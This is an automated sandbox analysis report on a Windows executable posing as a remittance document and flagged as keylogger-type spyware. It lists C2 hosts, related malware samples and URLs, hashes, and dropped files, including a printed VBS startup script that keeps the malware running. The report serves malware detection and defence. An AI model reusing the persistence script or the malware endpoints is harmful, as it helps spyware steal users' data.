                            • 75% < No. of IPs
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- | --- | --- |
| 208.91.198.143 | us2.smtp.mailhostbox.com | United States | | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true |
| 149.154.167.220 | api.telegram.org | United Kingdom | | 62041 | TELEGRAMRU | true |
| 188.114.97.3 | reallyfreegeoip.org | European Union | | 13335 | CLOUDFLARENETUS | true |
| 193.122.130.0 | checkip.dyndns.com | United States | | 31898 | ORACLE-BMC-31898US | false |
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1518314
Start date and time: 2024-09-25 15:33:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 50s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: z84TTREMITTANCEUSD347_432_63.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@10/3@4/4
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 56
                            • Number of non-executed functions: 309
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • VT rate limit hit for: z84TTREMITTANCEUSD347_432_63.exe
| Time | Type | Description |
| --- | --- | --- |
| 09:34:13 | API Interceptor | 13598267x Sleep call for process: RegSvcs.exe modified |
| 15:34:13 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
| --- | --- | --- | --- | --- | --- | --- |
| 208.91.198.143 | New Order PO#86637.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
| | z1newpo.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
| | z68ORDER.scr.exe | Get hash | malicious | AgentTesla | Browse | |
| | z17invoice.exe | Get hash | malicious | AgentTesla | Browse | |
| | z47maaaaaaaaaaaaax.exe | Get hash | malicious | AgentTesla | Browse | |
| | SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsx | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| | product_list.xls | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| | SecuriteInfo.com.Other.Malware-gen.12504.4949.xlsx | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| | giehjhgjzJ.hta | Get hash | malicious | Cobalt Strike, MassLogger RAT, Snake Keylogger | Browse | |
| | NGL1Of0ZkJ.hta | Get hash | malicious | Cobalt Strike, AgentTesla | Browse | |
| 149.154.167.220 | rLegalOpinionCopy_doc.cmd | Get hash | malicious | VIP Keylogger | Browse | |
| | Teklifformu_Ekinoks LS 1087251 04-00000152.exe | Get hash | malicious | Snake Keylogger | Browse | |
| | test.bat | Get hash | malicious | MicroClip | Browse | |
| | rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
| | rTEKL__FTALEPVEF__YATTEKL__F__.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
| | rBSH200924_pdf.cmd.exe | Get hash | malicious | VIP Keylogger | Browse | |
| | Or3dzp4vB1.exe | Get hash | malicious | XWorm | Browse | |
| | z9OutstandingPayment.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
| | rdoc17000320240923070456.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| | SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe | Get hash | malicious | XWorm | Browse | |
| 188.114.97.3 | PO5118000306 pdf.exe | Get hash | malicious | FormBook | Browse | www.rtprajalojago.live/2wnz/ |
| | (PO403810)_VOLEX_doc.exe | Get hash | malicious | Lokibot | Browse | dddotx.shop/Mine/PWS/fre.php |
| | QUOTATION_SEPQTRA071244PDF.scr.exe | Get hash | malicious | Snake Keylogger | Browse | filetransfer.io/data-package/DiF66Hbf/download |
| | http://easyantrim.pages.dev/id.html | Get hash | malicious | HTMLPhisher | Browse | easyantrim.pages.dev/id.html |
| | QUOTATION_SEPQTRA071244PDF.scr.exe | Get hash | malicious | Snake Keylogger | Browse | filetransfer.io/data-package/13rSMZZi/download |
| | Purchase Order_ AEPL-2324-1126.exe | Get hash | malicious | FormBook | Browse | www.rtpngk.xyz/yhsl/ |
| | PO-001.exe | Get hash | malicious | FormBook | Browse | www.x0x9x8x8x7x6.shop/assb/ |
| | PO2024033194.exe | Get hash | malicious | FormBook | Browse | www.cc101.pro/4hfb/ |
| | ADNOC REQUESTS & reviews.exe | Get hash | malicious | FormBook | Browse | www.chinaen.org/zi4g/ |
| | updater.exe | Get hash | malicious | Unknown | Browse | microsoft-rage.world/Api/v3 |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
| --- | --- | --- | --- | --- | --- | --- |
| reallyfreegeoip.org | rLegalOpinionCopy_doc.cmd | Get hash | malicious | VIP Keylogger | Browse | 188.114.96.3 |
| | cargo details.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.96.3 |
| | Teklifformu_Ekinoks LS 1087251 04-00000152.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.96.3 |
| | FAKTURA_.EXE.exe | Get hash | malicious | DarkTortilla, Snake Keylogger | Browse | 188.114.97.3 |
| | rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.97.3 |
| | rTEKL__FTALEPVEF__YATTEKL__F__.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.97.3 |
| | rPROFORMAINVOICE-PO_ATS_1036pdf.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.96.3 |
| | rBSH200924_pdf.cmd.exe | Get hash | malicious | VIP Keylogger | Browse | 188.114.97.3 |
| | rShippingDocuments_Pdf.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.96.3 |
| | rcontractorder.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.97.3 |
| us2.smtp.mailhostbox.com | z9OutstandingPayment.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 208.91.199.223 |
| | PAYSLIP.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 208.91.199.224 |
| | SWIFT COPY.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 208.91.199.224 |
| | SecuriteInfo.com.Win32.RATX-gen.3768.11045.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 208.91.199.223 |
| | UPDATED FLOOR PLAN_3D.EXE.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 208.91.199.223 |
| | New Order PO#86637.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 208.91.199.223 |
| | 2.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 208.91.199.225 |
| | z1newpo.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 208.91.198.143 |
| | Invoice Payment.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 208.91.199.224 |
| | z47TTSWIFTCOPY.scr.exe | Get hash | malicious | AgentTesla | Browse | 208.91.199.223 |
| checkip.dyndns.com | rLegalOpinionCopy_doc.cmd | Get hash | malicious | VIP Keylogger | Browse | 132.226.247.73 |
| | cargo details.exe | Get hash | malicious | Snake Keylogger | Browse | 132.226.247.73 |
| | Teklifformu_Ekinoks LS 1087251 04-00000152.exe | Get hash | malicious | Snake Keylogger | Browse | 132.226.247.73 |
| | FAKTURA_.EXE.exe | Get hash | malicious | DarkTortilla, Snake Keylogger | Browse | 193.122.6.168 |
| | rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 193.122.6.168 |
| | rTEKL__FTALEPVEF__YATTEKL__F__.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.8.169 |
| | rPROFORMAINVOICE-PO_ATS_1036pdf.exe | Get hash | malicious | Snake Keylogger | Browse | 132.226.8.169 |
| | rBSH200924_pdf.cmd.exe | Get hash | malicious | VIP Keylogger | Browse | 193.122.6.168 |
| | rShippingDocuments_Pdf.exe | Get hash | malicious | Snake Keylogger | Browse | 132.226.247.73 |
| | rcontractorder.exe | Get hash | malicious | Snake Keylogger | Browse | 193.122.6.168 |
| api.telegram.org | rLegalOpinionCopy_doc.cmd | Get hash | malicious | VIP Keylogger | Browse | 149.154.167.220 |
| | Teklifformu_Ekinoks LS 1087251 04-00000152.exe | Get hash | malicious | Snake Keylogger | Browse | 149.154.167.220 |
| | test.bat | Get hash | malicious | MicroClip | Browse | 149.154.167.220 |
| | rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220 |
| | rTEKL__FTALEPVEF__YATTEKL__F__.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220 |
| | rBSH200924_pdf.cmd.exe | Get hash | malicious | VIP Keylogger | Browse | 149.154.167.220 |
| | Or3dzp4vB1.exe | Get hash | malicious | XWorm | Browse | 149.154.167.220 |
| | z9OutstandingPayment.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220 |
| | rdoc17000320240923070456.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220 |
| | SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe | Get hash | malicious | XWorm | Browse | 149.154.167.220 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| --- | --- | --- | --- | --- |
| TELEGRAMRU | rLegalOpinionCopy_doc.cmd | malicious | VIP Keylogger | 149.154.167.220 |
|  | Teklifformu_Ekinoks LS 1087251 04-00000152.exe | malicious | Snake Keylogger | 149.154.167.220 |
|  | test.bat | malicious | MicroClip | 149.154.167.220 |
|  | rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
|  | rTEKL__FTALEPVEF__YATTEKL__F__.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
|  | rBSH200924_pdf.cmd.exe | malicious | VIP Keylogger | 149.154.167.220 |
|  | Or3dzp4vB1.exe | malicious | XWorm | 149.154.167.220 |
|  | z9OutstandingPayment.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
|  | rdoc17000320240923070456.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220 |
|  | SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe | malicious | XWorm | 149.154.167.220 |
| CLOUDFLARENETUS | rLegalOpinionCopy_doc.cmd | malicious | VIP Keylogger | 188.114.96.3 |
|  | cargo details.exe | malicious | Snake Keylogger | 188.114.96.3 |
|  | update.ps1 | malicious | NetSupport RAT, HTMLPhisher | 104.21.73.126 |
|  | https://1drv.ms/o/s!AnrtiNmLLRZglVBmj_pzjvzIvHZ7?e=WnZeS1 | malicious | HtmlDropper | 104.18.94.41 |
|  | hnvc.vbs | malicious | PureLog Stealer | 188.114.97.3 |
|  | 1e#U0414.exe | malicious | Lokibot | 188.114.96.3 |
|  | wm.vbs | malicious | PureLog Stealer, XWorm | 188.114.96.3 |
|  | Teklifformu_Ekinoks LS 1087251 04-00000152.exe | malicious | Snake Keylogger | 188.114.96.3 |
|  | http://mir-belting.com | malicious | Unknown | 162.159.140.229 |
|  | https://empshentel.com/share/sharefile/ | malicious | HTMLPhisher | 172.67.177.128 |
| PUBLIC-DOMAIN-REGISTRYUS | z9OutstandingPayment.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.199.223 |
|  | http://www.tri-star.in/mn/onedrive.html | malicious | Unknown | 208.91.198.225 |
|  | PAYSLIP.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.199.224 |
|  | SWIFT COPY.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.199.224 |
|  | SecuriteInfo.com.Win32.RATX-gen.3768.11045.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.199.223 |
|  | Payment Receipt for 30% Advance PI.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 103.21.58.10 |
|  | PO-000001488.exe | malicious | AgentTesla | 199.79.62.115 |
|  | UPDATED FLOOR PLAN_3D.EXE.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.199.223 |
|  | https://www.cognitoforms.com/f/91H-aU-zmECx5kHQVFHicA/1 | malicious | HTMLPhisher | 119.18.58.80 |
|  | New Order PO#86637.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.199.223 |
| ORACLE-BMC-31898US | FAKTURA_.EXE.exe | malicious | DarkTortilla, Snake Keylogger | 193.122.6.168 |
|  | rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168 |
|  | rBSH200924_pdf.cmd.exe | malicious | VIP Keylogger | 193.122.6.168 |
|  | rcontractorder.exe | malicious | Snake Keylogger | 193.122.6.168 |
|  | rdoc17000320240923070456.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 193.122.6.168 |
|  | rPEDIDO-M456.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0 |
|  | SKMBT_C22024082310420.pdf.exe | malicious | Snake Keylogger | 193.122.6.168 |
|  | Pedido de GmbH.xls | malicious | Snake Keylogger | 158.101.44.242 |
|  | TT copy for SO-2409-032.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 158.101.44.242 |
|  | invoice.scr.exe | malicious | Snake Keylogger | 158.101.44.242 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| --- | --- | --- | --- | --- |
| 54328bd36c14bd82ddaa0c04b25ed9ad | rLegalOpinionCopy_doc.cmd | malicious | VIP Keylogger | 188.114.97.3 |
|  | cargo details.exe | malicious | Snake Keylogger | 188.114.97.3 |
|  | Teklifformu_Ekinoks LS 1087251 04-00000152.exe | malicious | Snake Keylogger | 188.114.97.3 |
|  | FAKTURA_.EXE.exe | malicious | DarkTortilla, Snake Keylogger | 188.114.97.3 |
|  | rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3 |
|  | rTEKL__FTALEPVEF__YATTEKL__F__.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3 |
|  | rPROFORMAINVOICE-PO_ATS_1036pdf.exe | malicious | Snake Keylogger | 188.114.97.3 |
|  | rBSH200924_pdf.cmd.exe | malicious | VIP Keylogger | 188.114.97.3 |
|  | t1RVQb98yT.exe | malicious | S400 RAT | 188.114.97.3 |
|  | 9Jvb8f4R5m.exe | malicious | S400 RAT | 188.114.97.3 |
| 3b5074b1b5d032e5620f69f9f700ff0e | rLegalOpinionCopy_doc.cmd | malicious | VIP Keylogger | 149.154.167.220 |
|  | update.ps1 | malicious | NetSupport RAT, HTMLPhisher | 149.154.167.220 |
|  | https://1drv.ms/o/s!AnrtiNmLLRZglVBmj_pzjvzIvHZ7?e=WnZeS1 | malicious | HtmlDropper | 149.154.167.220 |
|  | https://texicoschools-my.sharepoint.com/:f:/p/bhadley/EsaMKJ-X61dEm1tZEaws2DMBSjLuzfhGBl4pu2aaho1XiQ?e=fJogeV | malicious | Unknown | 149.154.167.220 |
|  | hnvc.vbs | malicious | PureLog Stealer | 149.154.167.220 |
|  | wm.vbs | malicious | PureLog Stealer, XWorm | 149.154.167.220 |
|  | Teklifformu_Ekinoks LS 1087251 04-00000152.exe | malicious | Snake Keylogger | 149.154.167.220 |
|  | http://mir-belting.com | malicious | Unknown | 149.154.167.220 |
|  | PO5118000306 pdf.exe | malicious | FormBook | 149.154.167.220 |
|  | test.bat | malicious | MicroClip | 149.154.167.220 |
                                                                    No context
                                                                    Process:C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):274432
                                                                    Entropy (8bit):6.978000929733236
                                                                    Encrypted:false
                                                                    SSDEEP:3072:uMT+kXbpbSzLSYiA5mFpd6Z/0ztcSP9dSPb4xRBOPlrY1iH1M86g:FT+kXbpbSzLSYi7FPK/UZ4b4xR8vHiTg
                                                                    MD5:E94A651905DDD299B4A1E8AB298BC126
                                                                    SHA1:B8102BBEBE368473200BB4DA2247C9FC50FB8D13
                                                                    SHA-256:1ACA42643DC434AFF3BCABC504FC45CE3ABA0BF560D34156C929F847B858A397
                                                                    SHA-512:FDE41734FD4F3500633CE4A07A337DB5FE4AAB8693D96B986D66CD7E3B4BA0E6D92130347EEE30338CA6DAFA22F35CCDD4D1B889C5BDE9DF54A8093FF71988CC
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:.b.NB0E3P8M0..1U.I4NF8LN.0E3T8M0YP1UJI4NF8LNA0E3T8M0YP1UJI4N.8LNO/.=T.D.x.0..h`&/Kl>3_"A5UmS8>_:>iV+fJ9 aY+..w..4?U0dD9Db8LNA0E3.}M0.Q2U..(F8LNA0E3.8O1RQaUJS0NF,LNA0E3Z.I0Yp1UJ.0NF8.NA.E3T:M0]P1UJI4NB8LNA0E3T.I0YR1UJI4ND8..A0U3T(M0YP!UJY4NF8LNQ0E3T8M0YP1U.q0N.8LNApA3C(M0YP1UJI4NF8LNA0E3TXI0UP1UJI4NF8LNA0E3T8M0YP1UJI4NF8LNA0E3T8M0YP1UJI4NF8LNA.E3\8M0YP1UJI4NN.LN.0E3T8M0YP1Ud=Q628LNU)A3T.M0YJ5UJK4NF8LNA0E3T8M0yP15d;G<%8LNV E3TxI0YB1UJU0NF8LNA0E3T8M0.P1.d;Q")[LNM0E3TXI0YR1UJg0NF8LNA0E3T8M0.P1.JI4NF8LNA0E3T8M0.h5UJI4N.8LNC0@3<.O0..0UII4N.8LH.G3.8M0YP1UJI4NF8LNA0E3T8M0YP1UJI4NF8LNA0E3T8M0.-.Z...'5..NA0E3T9O3]V9]JI4NF8LN?0E3.8M0.P1U}I4Nc8LN,0E3p8M0'P1U4I4N"8LN30E358M0.P1U%I4N(8LN?0E3J:e.YP;.lI6fg8LDA..@v8M:.Q1UN:.NF2.LA0A@p8M:.S1UN:.NF2.JA0A@r8M:.U1UNcnNE.ZHA0^\m8M:YS.@LI4Ul.LLi.E3^8g.YS.@LI4Ul.LL.9E3P..CDP1Sb.4NLLENA2.9T8I.GR..JI>ddFGNA4n3~.3<YP5~Jc.0K8LJj0o-V.@0YT.w4G4NB.LdcNJ3T<f0sN3.EI4Jl.2^A0A.T.oNHP1QaI.l8*LNE.E.vF^0YT.U`kJZF8HeA.gMA8M4rP.w4_4NB.LdcNR3T<f0srOMJI0eF.RL.(E3P.K.;PC_\IDM
                                                                    Process:C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1275767
                                                                    Entropy (8bit):7.397264637586639
                                                                    Encrypted:false
                                                                    SSDEEP:24576:pRmJkcoQricOIQxiZY1iaJ+QdSbdZwy1mynIMrNdUtl85Pf:mJZoQrbTFZY1iaJB0zDIME6
                                                                    MD5:34280E3A145D8D865EFEDF422B568E46
                                                                    SHA1:D5E2B2072A08A672D87446DF36E513095945D151
                                                                    SHA-256:4FFAD08E9B831394159944B7C719BD9A80EFCDE000EBFA788DE1A23F64007B91
                                                                    SHA-512:20C33FC3B8AB2F6988BB8B149E625BAAD6D442B6E278AB0AF1F4FE793272CCDF2803AF503CF1E1E3CCD1DA8503EDFCF8D26745E685518D4B40023FB9C1DFA284
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Reputation:low
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O..........#..................e....... ....@...........................................@.......@.........................T.......x7........................................................................... ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc...x7.......8...T..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\directory\name.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):270
                                                                    Entropy (8bit):3.4297698362729916
                                                                    Encrypted:false
                                                                    SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1Al1AE6nriIM8lfQVn:DsO+vNlzQ1A1z4mA2n
                                                                    MD5:3DA73F5D6073C0D8F7B9CEE8DF5035A7
                                                                    SHA1:D4B44315FD7C6171A9CC03899A00E593AE78CDE7
                                                                    SHA-256:1F2D7E91D96B7DA16BC230D9C519E5E0A6A78FCD6B3468E590D5A97239BB420B
                                                                    SHA-512:CE2041AA9AAFE863C44296E4ED58BA207E4849584AB057B93354F10679DC1BFAE50241EEDAD74DCC4D7AF6C8ADC3A97E4581F56E5E71955651D52BA866ED763B
                                                                    Malicious:true
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.d.i.r.e.c.t.o.r.y.\.n.a.m.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.397264637586639
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:z84TTREMITTANCEUSD347_432_63.exe
                                                                    File size:1'275'767 bytes
                                                                    MD5:34280e3a145d8d865efedf422b568e46
                                                                    SHA1:d5e2b2072a08a672d87446df36e513095945d151
                                                                    SHA256:4ffad08e9b831394159944b7c719bd9a80efcde000ebfa788de1a23f64007b91
                                                                    SHA512:20c33fc3b8ab2f6988bb8b149e625baad6d442b6e278ab0af1f4fe793272ccdf2803af503cf1e1e3ccd1da8503edfcf8d26745e685518d4b40023fb9c1dfa284
                                                                    SSDEEP:24576:pRmJkcoQricOIQxiZY1iaJ+QdSbdZwy1mynIMrNdUtl85Pf:mJZoQrbTFZY1iaJB0zDIME6
                                                                    TLSH:8645DF21B5D240E5D1E22EB25D79F355BA6A6D260222819FE3C839F10E73380D7297F7
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                                    Icon Hash:cf818c848c8a814f
                                                                    Entrypoint:0x4165c1
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:0
                                                                    File Version Major:5
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                                    Instruction
                                                                    call 00007F59186F28FBh
                                                                    jmp 00007F59186E976Eh
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push edi
                                                                    push esi
                                                                    mov esi, dword ptr [ebp+0Ch]
                                                                    mov ecx, dword ptr [ebp+10h]
                                                                    mov edi, dword ptr [ebp+08h]
                                                                    mov eax, ecx
                                                                    mov edx, ecx
                                                                    add eax, esi
                                                                    cmp edi, esi
                                                                    jbe 00007F59186E98EAh
                                                                    cmp edi, eax
                                                                    jc 00007F59186E9A86h
                                                                    cmp ecx, 00000080h
                                                                    jc 00007F59186E98FEh
                                                                    cmp dword ptr [004A9724h], 00000000h
                                                                    je 00007F59186E98F5h
                                                                    push edi
                                                                    push esi
                                                                    and edi, 0Fh
                                                                    and esi, 0Fh
                                                                    cmp edi, esi
                                                                    pop esi
                                                                    pop edi
                                                                    jne 00007F59186E98E7h
                                                                    jmp 00007F59186E9CC2h
                                                                    test edi, 00000003h
                                                                    jne 00007F59186E98F6h
                                                                    shr ecx, 02h
                                                                    and edx, 03h
                                                                    cmp ecx, 08h
                                                                    jc 00007F59186E990Bh
                                                                    rep movsd
                                                                    jmp dword ptr [00416740h+edx*4]
                                                                    mov eax, edi
                                                                    mov edx, 00000003h
                                                                    sub ecx, 04h
                                                                    jc 00007F59186E98EEh
                                                                    and eax, 03h
                                                                    add ecx, eax
                                                                    jmp dword ptr [00416654h+eax*4]
                                                                    jmp dword ptr [00416750h+ecx*4]
                                                                    nop
                                                                    jmp dword ptr [004166D4h+ecx*4]
                                                                    nop
                                                                    inc cx
                                                                    add byte ptr [eax-4BFFBE9Ah], dl
                                                                    inc cx
                                                                    add byte ptr [ebx], ah
                                                                    ror dword ptr [edx-75F877FAh], 1
                                                                    inc esi
                                                                    add dword ptr [eax+468A0147h], ecx
                                                                    add al, cl
                                                                    jmp 00007F591AB620E7h
                                                                    add esi, 03h
                                                                    add edi, 03h
                                                                    cmp ecx, 08h
                                                                    jc 00007F59186E98AEh
                                                                    rep movsd
                                                                    jmp dword ptr [00000000h+edx*4]
                                                                    Programming Language:
                                                                    • [ C ] VS2010 SP1 build 40219
                                                                    • [C++] VS2010 SP1 build 40219
                                                                    • [ C ] VS2008 SP1 build 30729
                                                                    • [IMP] VS2008 SP1 build 30729
                                                                    • [ASM] VS2010 SP1 build 40219
                                                                    • [RES] VS2010 SP1 build 40219
                                                                    • [LNK] VS2010 SP1 build 40219
| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x13778 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |  |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
